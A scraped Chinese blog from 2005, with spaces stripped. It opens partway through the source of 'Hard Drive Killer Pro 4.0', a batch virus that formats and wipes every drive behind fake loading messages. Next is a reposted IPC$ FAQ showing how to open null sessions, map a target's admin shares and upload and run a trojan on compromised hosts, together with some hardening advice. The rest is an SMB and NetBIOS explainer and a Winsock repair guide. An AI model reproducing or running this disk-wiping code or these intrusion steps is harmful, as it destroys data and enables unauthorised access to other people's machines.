echofor%%%%ain(%drive%)docallc:\temp.bat%%%%aBunga>nul>>c:\auto.bat
echocls>>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
echofor%%%%ain(%drive%)calldeltree/y%%%%a:\>nul>>c:\auto.bat
echocd\>>c:\auto.bat
echocls>>c:\auto.bat
echoechoWelcometothelandofdeath.MungaBungasMultipleHardDriveKillerversion4.0.>>c:\auto.bat
echoechoIfyouranthisfile,thensorry,Ijustmadeit.Thepurposeofthisprogramistotellyouthefollowing...>>c:\auto.bat
echoecho1.Tomakepeopleawarethatsecurityshouldnotbetakenforgranted.>>c:\auto.bat
echoecho2.Loveisimportant,ifyouhaveit,truly,dontletgoofitlikeIdid!>>c:\auto.bat
echoecho3.IfyouareNOTavegetarian,thenyouareamurderer,andImgladyourHDisdead.>>c:\auto.bat
echoecho4.Dontsupportthefollowing:War,Racism,DrugsandtheLiberalParty.>>c:\auto.bat
echoecho.>>c:\auto.bat
echoechoRegards,>>c:\auto.bat
echoecho.>>c:\auto.bat
echoechoMungaBunga>>c:\auto.bat
callattrib+r+hc:\auto.bat
:makedir
ifexistc:\temp.batattrib-r-hc:\temp.bat>nul
echo@echooff>c:\temp.bat
echo%%1:\>>c:\temp.bat
echocd\>>c:\temp.bat
echo:startmd>>c:\temp.bat
echofor%%%%ain("ifnotexist%%2\nulmd%%2""ifexist%%2\nulcd%%2"do%%%%a>>c:\temp.bat
echofor%%%%ain(">ass_hole.txt"doecho%%%%aYourGone@$$hole!!!!>>c:\temp.bat
echoifnotexist%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nulgotostartmd>>c:\temp.bat
callattrib+r+hc:\temp.bat>nul
cls
echoInitializingvariables...
remdeltree/y%%a:\*.onlyeliminatesdirectories,henceleavingthefilecreatedaboveforfurtherdestruction.
for%%ain(%drive%)docallformat%%a:/q/u/autoSample>nul
cls
echoInitializingvariables...
echoValidatingData...
for%%ain(%drive%)docallc:\temp.bat%%aMunga>nul
cls
echoInitializingvariables...
echoValidatingData...
echoAnalyzingSystemStructure...
for%%ain(%drive%)callattrib-r-h%%a:\/S>nul
callattrib+r+hc:\temp.bat>nul
callattrib+r+hc:\auto.bat>nul
cls
echoInitializingvariables...
echoValidatingData...
echoAnalyzingSystemStructure...
echoInitializingApplication...
for%%ain(%drive%)calldeltree/y%%a:\*.>nul
cls
echoInitializingvariables...
echoValidatingData...
echoAnalyzingSystemStructure...
echoInitializingApplication...
echoStartingApplication...
for%%ain(%drive%)docallc:\temp.bat%%aMunga>nul
cls
echoThankyouforusingaMungaBungaproduct.
echo.
echoOhand,BillGatesrules,andheisnotageek,heisagoodlookinggenius.
echo.
echoHereisajokeforyou...
echo.
echoQ).Whatstheworstthingaboutbeinganegg?
echoA).Youonlygetlaidonce.
echo.
echoHAHAHAHA,getit?Dontyoujustlovethatone?
echo.
echoRegards,
echo.
echoMungaBunga
:end
remHardDriveKillerProVersion4.0,enjoy!!!!
remAuthor:MungaBunga-fromAustralia,thelandfullofretardedAustralians(helpmegetoutofhere).
由config发表于03:41PM|Comments(1)|TrackBack
------------------------------------------------------------------------------------------------------------------
April29,2005
ipc$常见问题[转贴]
1,怎样建立空连接,它有什么用?
答:使用命令netuse$">\\IP\ipc$""/user:""就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接
解剖WIN2K下的空会话http://www.sandflee.net/txt/list.asp?id=117;
2,为什么我连不上IPC$?
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2,确认你的命令没有打错。正确的命令是:netuse\\目标IP\ipc$"密码"/user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。各位看着办吧,呵呵。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令netshareipc$来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令netusez:\\目标IP\c$"密码"/user:"用户名"将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如copymuma.exe$\path\muma.exe">\\IP\d$\path\muma.exe。或者再映射也可以,只是不用用户名和密码了:netusey:$">\\IP\d$。然后copymuma.exey:\path\muma.exe。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令netuse$">\\IP\ipc$/del删除和一个目标的ipc$连接。
用命令netusez:/del删除映射的z盘,其他盘类推。
用命令netuse*/del删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
netshareipc$/del
netshareadmin$/del
netsharec$/del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
netstoplanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
-----------------------------------------------------------------------------------------------
由config发表于03:45PM|Comments(0)|TrackBack
April28,2005
网上邻居的内幕[转帖]
有关网上邻居的问题,问的人一直比较多,在理解上存在的误区也普遍较为严重。鉴于Microsoft的NETBIOS文档不是很细致,我四处收集了一些相关资料加上自己的实践经验写了这个系列,希望能对大家有所帮助.
本来想为了增加可读性,把这个系列写成问答的形式,不过一时之间脑袋里也编不出这么多的问题,还是按部就班先感性的对微软的浏览服务作一大致介绍,然后再深入剖析NETBIOS的具体工作机理,大家要是有什么问题,可以提出来我们一起讨论.
***微软网络浏览过程简介***
在“WindowsNT系统管理技术内幕”一书中,讲到了一个非常具有代表性的问题,我把它摘抄了下来:
问:什么情况下会导致在网络邻居中计算机能看见却无法访问或可以访问却看不见?请选择最佳答案:A.你的网络存在物理问题,比如网线B.作为域主浏览器的Windows
NTserver的浏览服务坏了C.WindowsNTserver网卡有问题D.你的网络没有问题,用户描述的是正常的微软浏览现象
正确答案D
书上的解释:微软的网络浏览可能在使用中出现"中断",而实际上它们并没有中断,这种误解是由于用户对微软网络浏览的处理过程不熟悉造成的。
就象同学们经常在抱怨的“为什么别人的网上邻居可以用,我的却不行?”“为什么有时候可以浏览,有时候却无法浏览网络?”解铃还须系铃人,让我们一起去看看微软的网络浏览到底是如何实现的。鉴于大家可能对NT的“域”概念还不甚了解,出现浏览故障的也多为98的机子,我将以98的“工作组模式”为大家讲解。
1.什么是浏览列表(BrowsingList)在微软网络中,用户可以在浏览列表里看到整个网络(何指?子网还是广播域?大家可以考虑考虑)上所有的计算机。当你通过网上邻居窗口打开整个网络时,你将看到一个工作组列表,再打开某个工作组,你将看到里面的计算机列表(也可在DOS方式下用netview/domain:workgroupname命令得到),这就是我们所说的BrowsingList。工作组从本质上说就是共享一个浏览列表的一组计算机,所有的工作组之间都是对等的,没有规定不可以让所有的计算机同处于一个工作组中。
2.浏览列表在哪里曾在木棉上看到过一场争论,有人说:网上邻居里的计算机列表是广播查询得来的。可有人举反例说:我的同学都关机了,可我还是能在网上邻居里看到它,应该是从HUB或交换机之类较为固定的设备的缓存中取得的。其实他们都只说对了一个方面,把他们二人的说法结合起来就是正确答案了---浏览列表是通过广播查询浏览主控服务器,由浏览主控服务器提供的。
3.浏览主控服务器又是什么浏览主控服务器是工作组中的一台最为重要的计算机,它负责维护本工作组中的浏览列表及指定其他工作组的主控服务器列表,为本工作组的其他计算机和其他来访本工作组的计算机提供浏览服务,每个工作组都为会每个传输协议选择一个浏览主控服务器,而我们经常遇到的无法浏览网络的错误大多是因为你所处的工作组没有浏览主控服务器而造成的。你可以在一个工作组中用NBTSTAT-acomputername命令找出使用NBT协议的浏览主控服务器,它的标识是含有\\_MSBROWSE_名字段。
4.浏览主控服务器是如何指定的缺省情况下,win98工作组中的浏览主控服务器是该工作组中第一台启用文件及打印机共享功能的计算机,也允许手工将一台win计算机配置为浏览主控服务器(方法会在后面讲述网络配置时具体介绍,但由于浏览主控服务器需要维护动态浏览列表,性能会受影响),如果一个工作组中有多台计算机配置了这个选项,或是当前的浏览主控服务器关闭了系统,又没有其他计算机启用主控设置时,就要进行主控浏览器的选举。
5.如何通过浏览器选举产生浏览主控服务器关于浏览器的选举报文,不太好抓包,我就只好按书上的东西来讲述了.其实过程很简单,首先由一台计算机发送一个选举临界报文,该报文包含了来自发送计算机的信息(操作系统,版本及NET名等),选举报文向网络中广播,工作组中的每一台计算机都会用自身信息与选举报文进行优先级比较,主要是操作系统起主要作用,记得好像是NTServer>NTWorkstation>Win98>WFWG,反正到最后是那个自身条件最好的成为新的浏览主控服务器.
6.整个网络浏览的过程是怎样的当一台win98进入网络时,如果它带有服务器服务(启用了文件及打印机共享)会向网络广播宣告自己的存在,而浏览主控服务器会取得这个宣告并将它放入自己维护的浏览列表中;而没有在相应协议上绑定文件及打印机共享的计算机则不会宣告,因而也就不会出现在网络邻居里了。当客户计算机想获得需要的网络资源列表时,首先会广播发出浏览请求,浏览主控服务器收到请求后,如果请求的是本组的浏览列表,则直接将客户所需的资源列表发回;如果请求的是其它工作组的浏览列表,浏览主控服务器会根据本身BrowsingList中的记录找到相应工作组的主控浏览器返回给用户,用户可从那里得到它想要的浏览列表。至于如何去和另一台计算机共享交换资源,就不是我们这里要讨论的问题了。
明白了网络浏览的原理,下面我给大家讲一个有用的应用,现在很多同学出于安全的考虑都不太欢迎陌生人通过网上邻居访问自己的机子,可有时下部电影又需要给认识的同学共享出来,因而还不能删除文件及打印机共享服务。怎么办?有些人给共享名加个$,以达到隐藏的效果,可这用DOS下的netshare是可被看到的;有些人给共享加上密码,可听说这也是有办法破解的,而且很容易激起“黑客同志”的好奇心。有没有办法将自己的机器在网络邻居里隐藏起来呢?而对于认识的同学可以让他用\\IP来访问。想对了,关键就是要阻止自己的机器向网络中去宣告自己,而且我知道我们其中的一些人已经将此变成了现实,至于方法嘛,就不要来问我了。
注:因为有关win98浏览服务的资料很少,涉及的书籍也多为以NT的“域”模型进行介绍,因而我只能根据自己的理解结合netxray的实践来测试,细节部分难免有错,欢迎大家指正。
7.在我的网上邻居里为什么有些机子访问不了如果微软的网上邻居真能做到所见即所得,相信抱怨它的人不会象现在这么多,可通过前面对浏览服务的介绍,大家已经知道这是不可能的,因为浏览列表的获得不是通过访问其中每一台机子得到的,很多时候网络中的计算机并不能正确更新浏览列表。当一台计算机正常关机时,它会向网络发出广播宣告,使浏览主控服务器及时将它从浏览列表中删除;而非正常关机后,浏览列表里仍会把该条目保持很长一段时间(NT下是45分钟),这就是我们仍能在网络邻居里看到它的原因.而98的稳定性是众所周知的----在还没来得及关机前就已经崩溃了^-^
SMB(ServerMessageBlock)协议在NT/2000中用来作文件共享,在NT中,SMB运行于NBT(NetBIOSoverTCP/IP)上,使用137,139(UDP),139(TCP)端口。在2000中,SMB可以直接运行在tcp/ip上,而没有额外的NBT层,使用TCP445端口。因此在2000上应该比NT稍微变化多一些。
可以在“网络连接/属性/TCPIP协议/属性/高级/WINS中设置启用或者禁用NBT(NetBIOSoverTCP/IP)。
当2000使用网络共享的时候,就面临着选择139或者445端口了。下面的情况确定会话使用的端口:
1、如果客户端启用了NBT,那么连接的时候将同时访问139和445端口,如果从445端口得到回应,那么客户端将发送RST到139端口,终止这个端口的连接,接着就从445端口进行SMB的会话了;如果没有从445端口而是从139得到回应,那么就从139端口进行会话;如果没有得到任何回应,那么SMB会话失败。
2、如果客户端禁用了NBT,他就将只从445端口进行连接。当然如果服务器(开共享端)没有445端口进行SMB会话的话,那么就会访问失败了,所以禁用445端口后,对访问NT机器的共享会失败。
3、如果服务器端启用NBT,那么就同时监听UDP137、138端口和TCP139,445。如果禁用NBT,那么就只监听445端口了。
所以对于2000来说,共享问题就不仅仅是139端口,445端口同样能够完成。
III、TheNULLsession,关于空会话
NULL会话(空会话)使用端口也同样遵循上面的规则。NULL会话是同服务器建立的无信任支持的会话。一个会话包含用户的认证信息,而NULL会话是没有用户的认证信息,也就好比是一个匿名的一样。
没有认证就不可能为系统建立安全通道,而建立安全通道也是双重的,第一,就是建立身份标志,第二就是建立一个临时会话密匙,双方才能用这个会话进行加密数据交换(比如RPC和COM的认证等级是PKT_PRIVACY)。不管是经过NTLM还是经过Kerberos认证的票据,终究是为会话创建一个包含用户信息的令牌。(这段来自JoeFinamore)
根据WIN2000的访问控制模型,对于空会话同样需要提供一个令牌。但是空会话由于是没有经过认证的会话,所以令牌中不包含用户信息,因此,建立会话双方没有密匙的交换,这也不能让系统间发送加密信息。这并不表示空会话的令牌中不包含SID,对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话建立的SID,用户名是ANONYMOUSLOGON。这个用户名是可以在用户列表中看到的。但是是不能在SAM数据库中找到,属于系统内置的帐号。
(关于这部分对NULLSESSION的分析,可以参照:《NULLSessionsInNT/2000》http://rr.sans.org/win/null.php)
NULL会话几乎成为了微软自己安置的后门,但是微软为什么要来设置这样一个“后门”呢?我也一直在想这个问题,如果NULL会话没有什么重要的用途,那么微软也应该不会来设置这样一个东西。好不容易才在微软上找到这个:
当在多域环境中,要在多域中建立信任关系,首先需要找到域中的PDC来通过安全通道的密码验证,使用空会话能够非常容易地找到PDC,还有就是关于一些系统服务的问题。而且LMHOSTS的#Include就需要空会话的支持,可以参考文章:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q121281
还有http://support.microsoft.com/default.aspx?scid=kb;EN-US;q124184
其实建立一个空会话的条件也非常严格。首先要能够满足上面的,也就是打开TCP139和TCP445端口。我们可以从一次关闭这两个端口的情况中看得出来。服务器关闭445和139端口,然后我们来进行空会话的连接。首先,客户端打算连接的是445端口,然后再试图连接139端口。当然最后还是失败了。仅仅开放这两个端口还不行,服务器还必须得打开IPC$共享。如果没有IPC共享,即使共享一个文件,有权限为AnonymousLogon,也不能建立会话,即使权限设置为完全控制,出现的连接错误依然是权限不够。这和其他帐号是不一样的。如果要允许一个文
件夹共享能够类似IPC$(命名管道而非共享)能够使用空会话,那么需要修改注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\中的:NullSessionShares,添加新的共享名,这样才能建立一个共享的空会话。这时,将不依赖IPC的存在了。(即使这样的空会话对于后面的突破也是一点没可取之处的,因为没有了IPC$命名管道,RPC不可取了,这下知道IPC这个命名管道的具体实现了。呵呵)
虽然空会话建立的要求很严格,但是那都是默认建立的。既然是默认的,对于使用WIN2K系统的服务器来说,就还是有利用的价值。最明显的就是空会话可以很方便地连接到其他的域,枚举用户、机器等。这也就是扫描软件进行探测的原理。
1.>有些人给共享名加个$,以达到隐藏的效果,可这用DOS下的netshare是可被看到的;
这种隐藏只是微软Windows标准客户端netview的限制,不是服务端的限制,网络传输过程中是一视同仁的,所以直接修改客户端解除这种限制或者使用第三方客户端软件均可看到所谓的隐藏共享,比如smbclient就是典型代表。而直接修改windows客户端的办法,99年袁哥贴过,我在华中Security版上转载过,精华区中还在。
2.>有些人给共享加上密码,可听说这也是有办法破解的
这个破解要看是什么层面上的,纯暴力破解的就不必说了,那当然总是可以的。而9598另有漏洞,袁哥发现的,就是他那个著名的vredir.vxd,服务端验证密码时所用长
度居然是客户端提供的,这就意味着至多猜测256次(事实上没这么多,考虑可打印字符范围)即可进入。当初N多人用这种办法非法浏览别人的机器。2000年报告微软,现在已修补。
http://security.nsfocus.net/index.php?
act=advisory&do=view&adv_id=6
顺便说一句,利用该漏洞可以快速穷举出原始口令,虽然在攻击中这是不必要的。
3.>因而我只能根据自己的理解结合netxray的实践来测试,细节部分难免有错,
推荐www.ethereal.com提供的Ethereal,这是我所见过的对SMB解码最强的免费软件,有Unix/Windows版,提供源码。
3.>在2000中,SMB可以直接运行在tcp/ip上,而没有额外的NBT层,使用TCP445端口。因此在2000上应该比NT稍微变化多一些。
事实上正相反,在ssaxh_capabilities字段中指明不使用"扩展安全验证",此时使用原有身份验证机制,只需去掉NBT层的SessionRequest,将139/TCP改成445/TCP,一样可以成功建立空会话,并且成功打开"\\\IPC$"。
至于更高层的RPCOverSMB,更是不必作任何变动。换句话说,从139/TCP换到445/TCP,整个通信过程中减少了一对NBTSessionRequest/Response,后面的报文对于两者来说是完全一致的。
而所谓的NBT层,即使在445通信中也未去掉,一直存在着,区别只是上面这段话。
4.>如果客户端启用了NBT,那么连接的时候将同时访问139和445端口,
微软并没有让139/TCP与445/TCP公平竞争。发起连接的SYN包在宏观上是同时发出的,具体起来,有时是先向139/TCP发起连接请求,有时是先向445/TCP发起连接请求,有点随机性。
在向139/TCP发送三次握手的最后一个ACK报文时,Windows顺手携带了数据,这里以一个刻意弄错的NetBIOS名(*SMBSERV<00...(8)>)做了一次NBTSessionRequest。而445/TCP不需要NBT层的会话。
由于刻意弄错的NetBIOS名,139/TCP很难竞争过445/TCP。服务端返回NegativeNBTSessionResponse,并且执行了close()操作。这使得必须重新建立到139/TCP的连接(传输层的TCP连接)。
可以看出,那个刻意弄错的NetBIOS名仅仅是为了给445/TCP制造抢先的机会。遗憾的是,445/TCP不争气,这个端口上的任务繁重、负载较高,即使在
这种不公平竞争的情况下,139/TCP仍有可能重新抢在445/TCP之前建立NBT会话(注意,不是TCP连接)。于是445口会回送RST,后续SMB会话建立在139/TCP连接之上。
微软自己的操作系统不认"*SMBSERV<00...(8)>",但是SambaServer2.2.5认,居然返回PositiveSessionResponse。这成为精确识别SambaServer的方法之一。
微软在<>中不会提这些的,只是说139/TCP、445/TCP公平竞争,优先使用最早返回的响应报文。不要相信它的鬼话。
话说回来,如非需求所致,完全不必关心这种差别。有需求的时候,这种差别是致命的。
5.>最明显的就是空会话可以很方便地连接到其他的域,枚举用户、机器等。这也就是>扫描软件进行探测的原理。
XP、2003缺省禁止在空会话上进行PolicyAccountDomainInformation查询,可以看到LsarOpenPolicy2(44)失败,权限否定。如果事先指定有效帐号、口令建立SMB会话,而非空会话,LsarOpenPolicy2(44)将成功返回。
由config发表于12:42PM|Comments(0)|TrackBack
-------------------------------------------------------------------------------------------------------------
April21,2005
unabletocontactipdriver,errorcode2
问题描述:
pingIP地址显示“unabletocontactipdriver,errorcode2”
ipconfig显示“aninternalerroroccurred:不支持请求”
原因
如果WinSocks注册表项已损坏,则可能出现此问题。
解决方案
警告:“注册表编辑器”使用不当可造成严重问题,这些问题可能需要重新安装操作系统。Microsoft不保证能够解决因为“注册表编辑器”使用不当而产生的问题。使用“注册表编辑器”需要您自担风险。若要解决此问题,请删除已损坏的注册表项,从已经安装TCP/IP的计算机导出注册表项信息并处理为.reg文件,然后将这些文件导入到存在本文“症状”一节中所述问题的计算机中。
第1步:删除已损坏的注册表项
1.单击“开始”,然后单击“运行”。
2.在“打开”框中,键入“regedit”,然后单击“确定”。
3.在“注册表编辑器”中,找到以下项,右键单击每个项,然后单击“删除”:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2
4.当提示您确认删除时,单击“是”。
第2步:将注册表项导出到软盘
备注:正在从中导入注册表项的计算机必须使用相同版本的Windows,并与存在本文“症状”一节中所述问题的计算机类似或完全相同。
1.将软盘插入到正在导出其注册表项的计算机的软盘驱动器中。
2.单击“开始”,然后单击“运行”。
3.在“打开”框中,键入“regedit”,然后单击“确定”。
4.找到并单击下面的注册表项:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2
5.按照下列步骤导出在第4步中找到的每个注册表项:
a.在“文件”菜单上,单击“导出”。
b.在“导出注册表文件”对话框的“保存在”框中,μ¥"÷?°3.5英寸软盘(A:)”,在“文件名”框中键入文件的名称,然后单击“保存”。
备注:一定要为每个.reg文件使用不同的名称。
6.退出“注册表编辑器”。
第3步:从软盘导入注册表项
1.将包含.reg文件的软盘插入到存在本文“症状”一节中所述问题的计算机的软盘驱动器中。
2.启动Windows资源管理器,然后找到软盘驱动器。
3.双击在“第2步:将注册表项导出到软盘”一节中创建并保存到软盘中的每个.reg文件。
4.在提示您向注册表添加信息时,单击“是”。
5.在看到已经向注册表中成功输入信息的消息时,单击“确定”?
MS关于这个问题的KB,建议大家看英文的
英文文章:
http://support.microsoft.com/default.aspx?kbid=811259
中文文章:
http://support.microsoft.com/?scid=kb%3Bzh-cn%3B811259&x=5&y=11
|